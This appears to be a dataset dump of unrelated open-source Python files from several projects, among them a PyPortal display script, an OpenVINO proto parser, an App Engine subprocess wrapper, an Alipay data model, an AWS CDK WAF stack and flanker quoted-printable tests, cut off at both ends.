help=f'How to import images [link_absolute], '
f'choose among: {", ".join(a.name for a in TransferAction)}')
####################################################################################################################
args = parser.parse_args()
logger.setLevel(args.verbose)
if args.verbose <= logging.DEBUG:
# also let kapture express its logs
kapture.utils.logging.getLogger().setLevel(args.verbose)
import_image_folder(args.input, args.output, args.force, args.image_transfer)
if __name__ == '__main__':
import_image_folder_command_line()
|
PyPortal_NewNewNew/newnewnew.py | joewalk102/Adafruit_Learning_System_Guides | 665 | 12685598 | import time
import board
import adafruit_pyportal
# We can cycle through the latest featured products
#PRODUCTS_TYPE = "featured"
#or we can view the latest new products
PRODUCTS_TYPE = "new"
# Set up where we'll be fetching data from
DATA_SOURCE = "https://www.adafruit.com/api/products?format=micro&"+PRODUCTS_TYPE+"=1&random=1"
# What data we'll be viewing
IMAGE_LOCATION = [0, "image"]
NAME_LOCATION = [0, "name"]
URL_LOCATION = [0, "url"]
# determine the current working directory needed so we know where to find files
cwd = ("/"+__file__).rsplit('/', 1)[0]
pyportal = adafruit_pyportal.PyPortal(url=DATA_SOURCE,
json_path=(NAME_LOCATION, URL_LOCATION),
status_neopixel=board.NEOPIXEL,
default_bg=cwd+"/new_background.bmp",
text_font=cwd+"/fonts/Arial-Bold-12.bdf",
text_position=((5, 35), (5, 225)),
text_color=(0xFFFFFF, 0xFFFFFF),
text_wrap=(35, 35), # characters to wrap
image_json_path=IMAGE_LOCATION,
image_resize=(320, 240),
image_position=(0, 0))
pyportal.preload_font()
while True:
response = None
try:
response = pyportal.fetch()
print("Response is", response)
except (IndexError, RuntimeError, ValueError) as e:
print("Some error occured, retrying! -", e)
time.sleep(60)
|
packages/python/3.10.0-alpha.7/test.py | ShaneLee/piston | 1,320 | 12685602 | working = True
match working:
case True:
print("OK")
case False:
print() |
tools/mo/openvino/tools/mo/utils/simple_proto_parser.py | ryanloney/openvino-1 | 1,127 | 12685635 | # Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import ast
import logging as log
import os
from openvino.tools.mo.utils.error import Error
class SimpleProtoParser(object):
"""
This is a simple Proto2 parser that has limited functionality and is intended to parse configuration files for the
models created with Object Detection API only. The result of the parser is the dictionary.
"""
_tokens = list()
_result = dict()
def __init__(self):
self._tokens = list()
self._result = dict()
@staticmethod
def _convert_value_to_correct_datatype(value: str):
"""
Converts string representation of the token to a value with proper data type.
:param value: string representation to be converted.
:return: converted to a correct data type value.
"""
if value == 'true':
return True
if value == 'false':
return False
try:
result = ast.literal_eval(value)
return result
except Exception: # if it is not possible to evaluate the value then consider it as a string
return value
@staticmethod
def _convert_values_to_correct_datatypes(d: dict):
"""
Convert dictionary with values to correct data types.
:param d: dictionary with values.
:return: None
"""
for key, value in d.items():
if isinstance(value, dict):
__class__._convert_values_to_correct_datatypes(value)
elif isinstance(value, list):
d[key] = [__class__._convert_value_to_correct_datatype(item) for item in value]
else:
d[key] = __class__._convert_value_to_correct_datatype(value)
def _add_non_empty_token(self, token: str):
"""
Add token to the list of tokens if it is non-empty.
:param token: token to add
:return: None
"""
if token != "":
self._tokens.append(token)
def _parse_list(self, result: list, token_ind: int):
prev_token = '['
while token_ind < len(self._tokens):
cur_token = self._tokens[token_ind]
if cur_token == ']':
return token_ind + 1
if cur_token == ',':
if prev_token == ',' or prev_token == '[':
raise Error('Missing value in the list at position {}'.format(token_ind))
else:
result.append(cur_token)
token_ind += 1
prev_token = cur_token
return token_ind
def _parse_tokens(self, result: dict, token_ind: int, depth: int=0):
"""
Internal function that parses tokens.
:param result: current dictionary where to store parse result.
:param token_ind: index of the token from the tokens list to start parsing from.
:return: token index to continue parsing from.
"""
while token_ind < len(self._tokens):
cur_token = self._tokens[token_ind]
if cur_token == ',': # redundant commas that we simply ignore everywhere except list "[x, y, z...]"
token_ind += 1
continue
if cur_token == '}':
return token_ind + 1
next_token = self._tokens[token_ind + 1]
if next_token == '{':
result[cur_token] = dict()
token_ind = self._parse_tokens(result[cur_token], token_ind + 2, depth + 1)
elif next_token == ':':
next_next_token = self._tokens[token_ind + 2]
if next_next_token == '[':
result[cur_token] = list()
token_ind = self._parse_list(result[cur_token], token_ind + 3)
else:
if cur_token not in result:
result[cur_token] = self._tokens[token_ind + 2]
else:
if not isinstance(result[cur_token], list):
old_val = result[cur_token]
result[cur_token] = [old_val]
result[cur_token].append(self._tokens[token_ind + 2])
token_ind += 3
else:
raise Error('Wrong character "{}" in position {}'.format(next_token, token_ind))
if depth != 0:
raise Error('Input/output braces mismatch.')
return token_ind
def _convert_tokens_to_dict(self):
"""
Convert list of tokens into a dictionary with proper structure.
Then converts values in the dictionary to values of correct data types. For example, 'false' -> False,
'true' -> true, '0.004' -> 0.004, etc.
:return: True if conversion is successful.
"""
try:
self._parse_tokens(self._result, 0)
except Exception as ex:
log.error('Failed to convert tokens to dictionary: {}'.format(str(ex)))
return False
self._convert_values_to_correct_datatypes(self._result)
return True
def _split_to_tokens(self, file_content: str):
"""
The function gets file content as string and converts it to the list of tokens (all tokens are still strings).
:param file_content: file content as a string
"""
cur_token = ''
string_started = False
for line in file_content.split('\n'):
cur_token = ''
line = line.strip()
if line.startswith('#'): # skip comments
continue
for char in line:
if string_started:
if char == '"': # string ended
self._add_non_empty_token(cur_token)
cur_token = '' # start of a new string
string_started = False
else:
cur_token += char
elif char == '"':
self._add_non_empty_token(cur_token)
cur_token = '' # start of a new string
string_started = True
elif (char == " " and not string_started) or char == '\n':
self._add_non_empty_token(cur_token)
cur_token = ''
elif char in [':', '{', '}', '[', ']', ',']:
self._add_non_empty_token(cur_token)
self._tokens.append(char)
cur_token = ''
else:
cur_token += char
self._add_non_empty_token(cur_token)
self._add_non_empty_token(cur_token)
def parse_from_string(self, file_content: str):
"""
Parses the proto text file passed as a string.
:param file_content: content of the file.
:return: dictionary with file content or None if the file cannot be parsed.
"""
self._split_to_tokens(file_content)
if not self._convert_tokens_to_dict():
log.error('Failed to generate dictionary representation of file.')
return None
return self._result
def parse_file(self, file_name: str):
"""
Parses the specified file and returns its representation as dictionary.
:param file_name: file name to parse.
:return: dictionary with file content or None if the file cannot be parsed.
"""
if not os.path.exists(file_name):
log.error('File {} does not exist'.format(file_name))
return None
try:
with open(file_name) as file:
file_content = file.readlines()
except Exception as ex:
log.error('Failed to read file {}: {}'.format(file_name, str(ex)))
return None
return self.parse_from_string(''.join(file_content))
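if __name__ == '__main__':
    # Self-contained sketch, not part of the original module: parse a small
    # Object Detection API style snippet and show the resulting dictionary.
    _example_config = '''
    model {
      ssd {
        num_classes: 90
        use_depthwise: true
      }
    }
    '''
    # Expected result: {'model': {'ssd': {'num_classes': 90, 'use_depthwise': True}}}
    print(SimpleProtoParser().parse_from_string(_example_config))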
|
python_modules/dagster/dagster_tests/core_tests/definitions_tests/foo/bar.py | dbatten5/dagster | 4606 | 12685636 | from dagster import pipeline
from .baz import baz_solid # pylint: disable=import-error
@pipeline
def bar_pipeline():
baz_solid()
|
release/scripts/presets/fluid/oil.py | rbabari/blender | 365 | 12685652 | import bpy
bpy.context.fluid.domain_settings.viscosity_base = 5.0
bpy.context.fluid.domain_settings.viscosity_exponent = 5
|
tests/ext/test_sentry.py | hartungstenio/loafer | 111 | 12685676 | from unittest import mock
from loafer.ext.sentry import sentry_handler
def test_sentry_handler():
mock_scope = mock.MagicMock()
sdk_mocked = mock.Mock()
sdk_mocked.push_scope.return_value = mock_scope
handler = sentry_handler(sdk_mocked)
exc = ValueError("test")
exc_info = (type(exc), exc, None)
delete_message = handler(exc_info, "test")
assert delete_message is False
assert sdk_mocked.push_scope.called
mock_scope.__enter__.return_value.set_extra.assert_called_once_with(
"message", "test"
)
sdk_mocked.capture_exception.assert_called_once_with(exc_info)
def test_sentry_handler_delete_message():
mock_scope = mock.MagicMock()
sdk_mocked = mock.Mock()
sdk_mocked.push_scope.return_value = mock_scope
handler = sentry_handler(sdk_mocked, delete_message=True)
exc = ValueError("test")
exc_info = (type(exc), exc, None)
delete_message = handler(exc_info, "test")
assert delete_message is True
assert sdk_mocked.push_scope.called
mock_scope.__enter__.return_value.set_extra.assert_called_once_with(
"message", "test"
)
sdk_mocked.capture_exception.assert_called_once_with(exc_info)
|
rentomatic/use_cases/storageroom_use_cases.py | keobox/rentomatic | 410 | 12685678 | from rentomatic.shared import use_case as uc
from rentomatic.shared import response_object as res
class StorageRoomListUseCase(uc.UseCase):
def __init__(self, repo):
self.repo = repo
def process_request(self, request_object):
domain_storageroom = self.repo.list(filters=request_object.filters)
return res.ResponseSuccess(domain_storageroom)
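# Usage sketch (not part of the original module; the repository and request
# object below are assumed to follow the surrounding codebase's interfaces):
#
#     use_case = StorageRoomListUseCase(repo)       # repo exposes .list(filters=...)
#     response = use_case.execute(request_object)   # request_object exposes .filters
#     storagerooms = response.value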
|
AppServer/google/appengine/tools/devappserver2/safe_subprocess.py | loftwah/appscale | 790 | 12685683 | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A thread-safe wrapper for the subprocess module."""
import logging
import subprocess
import sys
import tempfile
import threading
# Subprocess creation is not threadsafe in Python. See
# http://bugs.python.org/issue1731717.
_popen_lock = threading.Lock()
# The provided Python binary on OS X also requires _popen_lock be held while
# writing to and closing the stdin of the subprocess.
if sys.platform == 'darwin':
_SUBPROCESS_STDIN_IS_THREAD_HOSTILE = True
else:
_SUBPROCESS_STDIN_IS_THREAD_HOSTILE = False
def start_process(args, input_string='', env=None, cwd=None, stdout=None,
stderr=None):
"""Starts a subprocess like subprocess.Popen, but is threadsafe.
The value of input_string is passed to stdin of the subprocess, which is then
closed.
Args:
args: A string or sequence of strings containing the program arguments.
input_string: A string to pass to stdin of the subprocess.
env: A dict containing environment variables for the subprocess.
cwd: A string containing the directory to switch to before executing the
subprocess.
stdout: A file descriptor, file object or subprocess.PIPE to use for the
stdout descriptor for the subprocess.
stderr: A file descriptor, file object or subprocess.PIPE to use for the
stderr descriptor for the subprocess.
Returns:
A subprocess.Popen instance for the created subprocess.
"""
with _popen_lock:
logging.debug('Starting process %r with input=%r, env=%r, cwd=%r',
args, input_string, env, cwd)
p = subprocess.Popen(args, env=env, cwd=cwd, stdout=stdout, stderr=stderr,
stdin=subprocess.PIPE)
if _SUBPROCESS_STDIN_IS_THREAD_HOSTILE:
p.stdin.write(input_string)
p.stdin.close()
p.stdin = None
if not _SUBPROCESS_STDIN_IS_THREAD_HOSTILE:
p.stdin.write(input_string)
p.stdin.close()
p.stdin = None
return p
def start_process_file(args, input_string, env, cwd, stdin=None, stdout=None,
stderr=None):
"""Starts a subprocess thread safely with temporary files for communication.
An alternate version of start_process that allows for the preservation
of stdin and stdout by creating two files that can be used for communication
between the processes. The paths to these files are added to the command
line after any args provided by the caller. The first file is written with
the value of input_string and the second file is returned to the caller.
Args:
args: A string or sequence of strings containing the program arguments.
input_string: A string to pass to stdin of the subprocess.
env: A dict containing environment variables for the subprocess.
cwd: A string containing the directory to switch to before executing the
subprocess.
stdin: A file descriptor, file object or subprocess.PIPE to use for the
stdin descriptor for the subprocess.
stdout: A file descriptor, file object or subprocess.PIPE to use for the
stdout descriptor for the subprocess.
stderr: A file descriptor, file object or subprocess.PIPE to use for the
stderr descriptor for the subprocess.
Returns:
A subprocess.Popen instance for the created subprocess. In addition to
the standard attributes, an additional child_out attribute is attached
that references a NamedTemporaryFile that the child process may write
and this process may read; it is up to the caller to delete the file
(path available as p.child_out.name).
"""
# In addition to needing to control deletion time, we need delete=False
# in order to allow multiple files to open the process on Windows.
child_in = tempfile.NamedTemporaryFile(mode='wb', delete=False)
child_out = tempfile.NamedTemporaryFile(mode='rb', delete=False)
child_in.write(input_string)
child_in.close()
# pylint: disable=g-no-augmented-assignment
# += modifies the original args which we don't want.
args = args + [child_in.name, child_out.name]
with _popen_lock:
logging.debug('Starting process %r with input=%r, env=%r, cwd=%r',
args, input_string, env, cwd)
p = subprocess.Popen(args, env=env, cwd=cwd, stdin=stdin, stdout=stdout,
stderr=stderr)
p.child_out = child_out
return p
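# Usage sketch (not part of the original module). start_process behaves like
# subprocess.Popen, but creation is serialized and input_string is written to
# the child's stdin up front:
#
#     import subprocess
#     p = start_process(['sort'], input_string='b\na\n', stdout=subprocess.PIPE)
#     print(p.stdout.read())   # -> 'a\nb\n'
#     p.wait()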
|
airmozilla/new/cron.py | mozilla/airmozilla | 115 | 12685690 | import cronjobs
from airmozilla.cronlogger.decorators import capture
from . import eventemails
@cronjobs.register
@capture
def send_new_event_emails():
eventemails.send_new_event_emails(verbose=True)
|
alipay/aop/api/domain/OrderItem.py | snowxmas/alipay-sdk-python-all | 213 | 12685692 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class OrderItem(object):
def __init__(self):
self._address = None
self._brand_name = None
self._category = None
self._city = None
self._city_code = None
self._commodity_id = None
self._contacts = None
self._creator = None
self._expire_date = None
self._merchant_name = None
self._merchant_pid = None
self._mini_app_id = None
self._mini_app_name = None
self._online_time = None
self._order_status = None
self._phone_no = None
self._province = None
self._shop_id = None
self._shop_name = None
self._shop_status = None
self._status = None
@property
def address(self):
return self._address
@address.setter
def address(self, value):
self._address = value
@property
def brand_name(self):
return self._brand_name
@brand_name.setter
def brand_name(self, value):
self._brand_name = value
@property
def category(self):
return self._category
@category.setter
def category(self, value):
self._category = value
@property
def city(self):
return self._city
@city.setter
def city(self, value):
self._city = value
@property
def city_code(self):
return self._city_code
@city_code.setter
def city_code(self, value):
self._city_code = value
@property
def commodity_id(self):
return self._commodity_id
@commodity_id.setter
def commodity_id(self, value):
self._commodity_id = value
@property
def contacts(self):
return self._contacts
@contacts.setter
def contacts(self, value):
self._contacts = value
@property
def creator(self):
return self._creator
@creator.setter
def creator(self, value):
self._creator = value
@property
def expire_date(self):
return self._expire_date
@expire_date.setter
def expire_date(self, value):
self._expire_date = value
@property
def merchant_name(self):
return self._merchant_name
@merchant_name.setter
def merchant_name(self, value):
self._merchant_name = value
@property
def merchant_pid(self):
return self._merchant_pid
@merchant_pid.setter
def merchant_pid(self, value):
self._merchant_pid = value
@property
def mini_app_id(self):
return self._mini_app_id
@mini_app_id.setter
def mini_app_id(self, value):
self._mini_app_id = value
@property
def mini_app_name(self):
return self._mini_app_name
@mini_app_name.setter
def mini_app_name(self, value):
self._mini_app_name = value
@property
def online_time(self):
return self._online_time
@online_time.setter
def online_time(self, value):
self._online_time = value
@property
def order_status(self):
return self._order_status
@order_status.setter
def order_status(self, value):
self._order_status = value
@property
def phone_no(self):
return self._phone_no
@phone_no.setter
def phone_no(self, value):
self._phone_no = value
@property
def province(self):
return self._province
@province.setter
def province(self, value):
self._province = value
@property
def shop_id(self):
return self._shop_id
@shop_id.setter
def shop_id(self, value):
self._shop_id = value
@property
def shop_name(self):
return self._shop_name
@shop_name.setter
def shop_name(self, value):
self._shop_name = value
@property
def shop_status(self):
return self._shop_status
@shop_status.setter
def shop_status(self, value):
self._shop_status = value
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
def to_alipay_dict(self):
params = dict()
if self.address:
if hasattr(self.address, 'to_alipay_dict'):
params['address'] = self.address.to_alipay_dict()
else:
params['address'] = self.address
if self.brand_name:
if hasattr(self.brand_name, 'to_alipay_dict'):
params['brand_name'] = self.brand_name.to_alipay_dict()
else:
params['brand_name'] = self.brand_name
if self.category:
if hasattr(self.category, 'to_alipay_dict'):
params['category'] = self.category.to_alipay_dict()
else:
params['category'] = self.category
if self.city:
if hasattr(self.city, 'to_alipay_dict'):
params['city'] = self.city.to_alipay_dict()
else:
params['city'] = self.city
if self.city_code:
if hasattr(self.city_code, 'to_alipay_dict'):
params['city_code'] = self.city_code.to_alipay_dict()
else:
params['city_code'] = self.city_code
if self.commodity_id:
if hasattr(self.commodity_id, 'to_alipay_dict'):
params['commodity_id'] = self.commodity_id.to_alipay_dict()
else:
params['commodity_id'] = self.commodity_id
if self.contacts:
if hasattr(self.contacts, 'to_alipay_dict'):
params['contacts'] = self.contacts.to_alipay_dict()
else:
params['contacts'] = self.contacts
if self.creator:
if hasattr(self.creator, 'to_alipay_dict'):
params['creator'] = self.creator.to_alipay_dict()
else:
params['creator'] = self.creator
if self.expire_date:
if hasattr(self.expire_date, 'to_alipay_dict'):
params['expire_date'] = self.expire_date.to_alipay_dict()
else:
params['expire_date'] = self.expire_date
if self.merchant_name:
if hasattr(self.merchant_name, 'to_alipay_dict'):
params['merchant_name'] = self.merchant_name.to_alipay_dict()
else:
params['merchant_name'] = self.merchant_name
if self.merchant_pid:
if hasattr(self.merchant_pid, 'to_alipay_dict'):
params['merchant_pid'] = self.merchant_pid.to_alipay_dict()
else:
params['merchant_pid'] = self.merchant_pid
if self.mini_app_id:
if hasattr(self.mini_app_id, 'to_alipay_dict'):
params['mini_app_id'] = self.mini_app_id.to_alipay_dict()
else:
params['mini_app_id'] = self.mini_app_id
if self.mini_app_name:
if hasattr(self.mini_app_name, 'to_alipay_dict'):
params['mini_app_name'] = self.mini_app_name.to_alipay_dict()
else:
params['mini_app_name'] = self.mini_app_name
if self.online_time:
if hasattr(self.online_time, 'to_alipay_dict'):
params['online_time'] = self.online_time.to_alipay_dict()
else:
params['online_time'] = self.online_time
if self.order_status:
if hasattr(self.order_status, 'to_alipay_dict'):
params['order_status'] = self.order_status.to_alipay_dict()
else:
params['order_status'] = self.order_status
if self.phone_no:
if hasattr(self.phone_no, 'to_alipay_dict'):
params['phone_no'] = self.phone_no.to_alipay_dict()
else:
params['phone_no'] = self.phone_no
if self.province:
if hasattr(self.province, 'to_alipay_dict'):
params['province'] = self.province.to_alipay_dict()
else:
params['province'] = self.province
if self.shop_id:
if hasattr(self.shop_id, 'to_alipay_dict'):
params['shop_id'] = self.shop_id.to_alipay_dict()
else:
params['shop_id'] = self.shop_id
if self.shop_name:
if hasattr(self.shop_name, 'to_alipay_dict'):
params['shop_name'] = self.shop_name.to_alipay_dict()
else:
params['shop_name'] = self.shop_name
if self.shop_status:
if hasattr(self.shop_status, 'to_alipay_dict'):
params['shop_status'] = self.shop_status.to_alipay_dict()
else:
params['shop_status'] = self.shop_status
if self.status:
if hasattr(self.status, 'to_alipay_dict'):
params['status'] = self.status.to_alipay_dict()
else:
params['status'] = self.status
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = OrderItem()
if 'address' in d:
o.address = d['address']
if 'brand_name' in d:
o.brand_name = d['brand_name']
if 'category' in d:
o.category = d['category']
if 'city' in d:
o.city = d['city']
if 'city_code' in d:
o.city_code = d['city_code']
if 'commodity_id' in d:
o.commodity_id = d['commodity_id']
if 'contacts' in d:
o.contacts = d['contacts']
if 'creator' in d:
o.creator = d['creator']
if 'expire_date' in d:
o.expire_date = d['expire_date']
if 'merchant_name' in d:
o.merchant_name = d['merchant_name']
if 'merchant_pid' in d:
o.merchant_pid = d['merchant_pid']
if 'mini_app_id' in d:
o.mini_app_id = d['mini_app_id']
if 'mini_app_name' in d:
o.mini_app_name = d['mini_app_name']
if 'online_time' in d:
o.online_time = d['online_time']
if 'order_status' in d:
o.order_status = d['order_status']
if 'phone_no' in d:
o.phone_no = d['phone_no']
if 'province' in d:
o.province = d['province']
if 'shop_id' in d:
o.shop_id = d['shop_id']
if 'shop_name' in d:
o.shop_name = d['shop_name']
if 'shop_status' in d:
o.shop_status = d['shop_status']
if 'status' in d:
o.status = d['status']
return o
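# Round-trip sketch (not part of the original module; the field values are
# hypothetical). The generated properties mirror the Alipay field names, and
# to_alipay_dict / from_alipay_dict convert between the object and its plain
# dict wire form:
#
#     item = OrderItem()
#     item.shop_id = '2088000000000000'
#     item.status = 'ONLINE'
#     payload = item.to_alipay_dict()          # {'shop_id': ..., 'status': ...}
#     restored = OrderItem.from_alipay_dict(payload)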
|
the-waf-apigateway/python/the_waf_apigateway/waf.py | mttfarmer/serverless | 1,627 | 12685696 | from aws_cdk import (
aws_cloudformation as cfn,
aws_wafv2 as waf,
core,
)
class Waf(cfn.NestedStack):
def __init__(self, scope: core.Construct, id: str, target_arn, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
waf_rules = []
# 1, AWS general rules
aws_managed_rules = waf.CfnWebACL.RuleProperty(
name='AWS-AWSManagedRulesCommonRuleSet',
priority=1,
override_action=waf.CfnWebACL.OverrideActionProperty(none={}),
statement=waf.CfnWebACL.StatementOneProperty(
managed_rule_group_statement=waf.CfnWebACL.ManagedRuleGroupStatementProperty(
name='AWSManagedRulesCommonRuleSet',
vendor_name='AWS',
excluded_rules=[waf.CfnWebACL.ExcludedRuleProperty(name='SizeRestrictions_BODY')]
)
),
visibility_config=waf.CfnWebACL.VisibilityConfigProperty(
cloud_watch_metrics_enabled=True,
metric_name='awsCommonRules',
sampled_requests_enabled=True,
),
)
waf_rules.append(aws_managed_rules)
# 2, AWS AnonIPAddress
aws_anoniplist = waf.CfnWebACL.RuleProperty(
name='awsAnonymousIP',
priority=2,
override_action=waf.CfnWebACL.OverrideActionProperty(none={}),
statement=waf.CfnWebACL.StatementOneProperty(
managed_rule_group_statement=waf.CfnWebACL.ManagedRuleGroupStatementProperty(
name='AWSManagedRulesAnonymousIpList',
vendor_name='AWS',
excluded_rules=[]
)
),
visibility_config=waf.CfnWebACL.VisibilityConfigProperty(
cloud_watch_metrics_enabled=True,
metric_name='awsAnonymous',
sampled_requests_enabled=True,
)
)
waf_rules.append(aws_anoniplist)
# 3 AWS ip reputation List
aws_ip_rep_list = waf.CfnWebACL.RuleProperty(
name='aws_Ipreputation',
priority=3,
override_action=waf.CfnWebACL.OverrideActionProperty(none={}),
statement=waf.CfnWebACL.StatementOneProperty(
managed_rule_group_statement=waf.CfnWebACL.ManagedRuleGroupStatementProperty(
name='AWSManagedRulesAmazonIpReputationList',
vendor_name='AWS',
excluded_rules=[]
)
),
visibility_config=waf.CfnWebACL.VisibilityConfigProperty(
cloud_watch_metrics_enabled=True,
metric_name='aws_reputation',
sampled_requests_enabled=True,
)
)
waf_rules.append(aws_ip_rep_list)
# 4 GeoBlock NZ from accessing gateway
geoblock_rule = waf.CfnWebACL.RuleProperty(
name='geoblocking_rule',
priority=4,
action=waf.CfnWebACL.RuleActionProperty(block={}),
statement=waf.CfnWebACL.StatementOneProperty(
geo_match_statement=waf.CfnWebACL.GeoMatchStatementProperty(
country_codes=['NZ'],
)
),
visibility_config=waf.CfnWebACL.VisibilityConfigProperty(
cloud_watch_metrics_enabled=True,
metric_name='geoblock',
sampled_requests_enabled=True,
)
)
waf_rules.append(geoblock_rule)
# Create the Waf ACL
WebACL = waf.CfnWebACL(self, 'WebACL',
default_action=waf.CfnWebACL.DefaultActionProperty(
allow={}
),
scope="REGIONAL", # vs 'CLOUDFRONT'
visibility_config=waf.CfnWebACL.VisibilityConfigProperty(
cloud_watch_metrics_enabled=True,
metric_name='webACL',
sampled_requests_enabled=True
),
name='HelloWorldACL',
rules=waf_rules
)
# Associate it with the resource provided.
waf.CfnWebACLAssociation(self, 'WAFAssnAPI',
web_acl_arn=WebACL.attr_arn,
resource_arn=target_arn
)
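# Usage sketch (not part of the original stack). The nested stack only needs a
# parent construct and the ARN of the resource to protect; `gateway` below is
# an assumed aws_apigateway.RestApi defined in the parent stack:
#
#     Waf(self, 'HelloWorldWaf', target_arn=gateway.deployment_stage.stage_arn)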
|
DataFormats/FWLite/scripts/edmLumisInFiles.py | ckamtsikis/cmssw | 852 | 12685710 | #! /usr/bin/env python
from __future__ import print_function
from FWCore.PythonUtilities.LumiList import LumiList
import optparse
if __name__ == '__main__':
parser = optparse.OptionParser ("Usage: %prog [--options] edm1.root [edm2.root...]",
description='Runs over input EDM files and prints out a list of contained lumi sections')
parser.add_option ('--intLumi', dest='intLumi', action='store_true',
help='print out total recorded and delivered integrated luminosity')
parser.add_option ('--output', dest='output', type='string',
help='save lumi sections output to file OUTPUT')
(options, args) = parser.parse_args()
# put this here after parsing the arguments since ROOT likes to
# grab command line arguments even when it shouldn't.
from DataFormats.FWLite import Lumis, Handle
if not args:
raise RuntimeError("Must provide at least one input file")
# do we want to get the luminosity summary?
if options.intLumi:
handle = Handle ('LumiSummary')
label = ('lumiProducer')
else:
        handle, label = None, None
runsLumisDict = {}
lumis = Lumis (args)
delivered = recorded = 0
for lum in lumis:
runList = runsLumisDict.setdefault (lum.aux().run(), [])
runList.append( lum.aux().id().luminosityBlock() )
# get the summary and keep track of the totals
if options.intLumi:
lum.getByLabel (label, handle)
summary = handle.product()
delivered += summary.avgInsDelLumi()
recorded += summary.avgInsRecLumi()
# print out lumi sections in JSON format
jsonList = LumiList (runsAndLumis = runsLumisDict)
if options.output:
jsonList.writeJSON (options.output)
else:
print(jsonList)
# print out integrated luminosity numbers if requested
if options.intLumi:
print("\nNote: These numbers should be considered approximate. For official numbers, please use lumiCalc.py")
print("delivered %.1f mb, recorded %.1f mb" % \
(delivered, recorded))
|
tests/mime/message/headers/part_test.py | skshetry/flanker | 929 | 12685717 | # coding:utf-8
import flanker.mime.message.part as part
from nose.tools import eq_
STRINGS = (
# Some normal strings
(b'', ''),
(b'hello', 'hello'),
(b'''hello
there
world''', '''hello
there
world'''),
(b'''hello
there
world
''', '''hello
there
world
'''),
(b'\201\202\203', '=81=82=83'),
# Add some trailing MUST QUOTE strings
(b'hello ', 'hello=20'),
(b'hello\t', 'hello=09'),
# Some long lines. First, a single line of 108 characters
(b'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\xd8\xd9\xda\xdb\xdc\xdd\xde\xdfxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx',
'''xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=D8=D9=DA=DB=DC=DD=DE=DFx=
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'''),
# A line of exactly 76 characters, no soft line break should be needed
(b'yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy',
'yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy'),
# A line of 77 characters, forcing a soft line break at position 75,
# and a second line of exactly 2 characters (because the soft line
# break `=' sign counts against the line length limit).
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz',
'''zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=
zz'''),
# A line of 151 characters, forcing a soft line break at position 75,
# with a second line of exactly 76 characters and no trailing =
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz',
'''zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz'''),
# A string containing a hard line break, but which the first line is
# 151 characters and the second line is exactly 76 characters. This
# should leave us with three lines, the first which has a soft line
# break, and which the second and third do not.
(b'''yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz''',
'''yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy=
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz'''),
# Lines that end with space or tab should be quoted
(b'yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy ',
'''yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy=
=20'''),
# Lines that end with a partial quoted character
(b'yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy=y',
'''yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy=
=3Dy'''),
# Lines that lead with a dot '.' should have the dot quoted
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.z',
